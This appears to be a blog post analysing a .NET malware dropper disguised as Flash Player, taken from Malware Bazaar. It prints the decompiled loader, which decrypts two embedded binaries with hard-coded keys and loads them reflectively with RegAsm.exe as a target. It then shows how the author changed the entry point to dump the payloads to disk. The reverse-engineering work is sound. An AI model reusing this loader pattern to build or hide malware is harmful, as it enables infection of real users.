I was browsing through Malware Bazaar and came across a Win32 Binary that hadn’t been tagged with anything specific, which piqued my interest it it
Grabbing the sample revealed a binary with a flash player logo, and detect it easy identified it as a .net binary.
I discovered a few interesting things by dropping the binary into DnSpy. The binary was a wrapped for 2 encrypted binaries bundled in the app’s resources, CLS.dlland Xola.exe
The app itself was just a really simple SymmetricAlgorithm decrypter that launches the decrypted binaries in a new thread
// Consol.Program
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
private static void Main()
{
Thread.GetDomain().Load(hpCGGsxnBfkpZyTC.jjjjjj).GetType(hpCGGsxnBfkpZyTC.tttttt).GetMethod(hpCGGsxnBfkpZyTC.kkkk).Invoke(null, new object[]
{
hpCGGsxnBfkpZyTC.locationstart,
hpCGGsxnBfkpZyTC.lastcode
});
}
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using Consol;
using Microsoft.VisualBasic.CompilerServices;
// Token: 0x02000003 RID: 3
public static class hpCGGsxnBfkpZyTC
{
// Token: 0x06000003 RID: 3 RVA: 0x000020A8 File Offset: 0x000002A8
public static byte[] syam(byte[] B, string ikey)
{
SymmetricAlgorithm symmetricAlgorithm = SymmetricAlgorithm.Create();
SHA256CryptoServiceProvider sha256CryptoServiceProvider = new SHA256CryptoServiceProvider();
byte[] key = sha256CryptoServiceProvider.ComputeHash(Encoding.BigEndianUnicode.GetBytes(ikey));
symmetricAlgorithm.Key = key;
symmetricAlgorithm.Mode = CipherMode.ECB;
return symmetricAlgorithm.CreateDecryptor().TransformFinalBlock(B, 0, B.Length);
}
// Token: 0x06000004 RID: 4 RVA: 0x000020F4 File Offset: 0x000002F4
public static byte[] ExtractResource(string filename)
{
byte[] result;
using (Stream manifestResourceStream = typeof(Program).Assembly.GetManifestResourceStream(filename))
{
if (manifestResourceStream == null)
{
result = null;
}
else
{
byte[] array = new byte[manifestResourceStream.Length];
manifestResourceStream.Read(array, 0, array.Length);
result = array;
}
}
return result;
}
// Token: 0x04000001 RID: 1
public static string locationstart = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe");
// Token: 0x04000002 RID: 2
public static byte[] lastcode = hpCGGsxnBfkpZyTC.syam(hpCGGsxnBfkpZyTC.ExtractResource("Xola.exe"), "ZiZ");
// Token: 0x04000003 RID: 3
public static byte[] jjjjjj = hpCGGsxnBfkpZyTC.syam(hpCGGsxnBfkpZyTC.ExtractResource("CLS.dll"), "جc吉尺O");
// Token: 0x04000004 RID: 4
public static string tttttt = Conversions.ToString("AZJCJfpyUsnAfJiyTLOifhLwQLhZwGQnrnOfJOnTpCiTDfBnyfynAAJxwhxnBJTLsQ.vrQBCQEUkZhMBwkZOZJQvLwhJxnADLpQChAphAJZfsMfxEiQLivpkxrTwsUwEkZMph");
// Token: 0x04000005 RID: 5
public static string kkkk = "yhxGkJfDMpTfiUkihOywMGfEhwUUQLLMnQOsEBvpnBEZUkExQhTyUQhJwkMJAisikT";
}
To keep things super simple and easy, I’m going to modify the hpCGGsxnBfkpZyTCclass to include a dump()function that will simply write the 2 binaries to the disk
public static void dump(string fileName, byte[] bytes)
{
File.WriteAllBytes("C:\\Temp\\" + fileName, bytes);
}
Then modify the entry point to dump the binaries instead of running them
using System;
namespace Consol
{
// Token: 0x02000002 RID: 2
internal class Program
{
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
private static void Main()
{
hpCGGsxnBfkpZyTC.dump("CLS.dll", hpCGGsxnBfkpZyTC.jjjjjj);
hpCGGsxnBfkpZyTC.dump("Xola.exe", hpCGGsxnBfkpZyTC.lastcode);
}
}
}
The result? 2 freshly decrypted malware samples in C:\Temp
I’ll dig into the 2 binaries in a part 2 sometime, but for now I’ll leave it there 🙂
References
https://bazaar.abuse.ch/sample/af45ff354aaf65c450cf147194b0f746243361b1385abe580ba10246fee9bd66/ CLS.dll - https://www.virustotal.com/gui/file/5026b4d5a20d9bd7f07f111adbfdcdffa3423e83a1f5a982c1c34ad610eaa678/details Xola.exe - https://www.virustotal.com/gui/file/f5e53da9273368bd53d088d573088865f80a318e9839a54214584c3eb98de003/details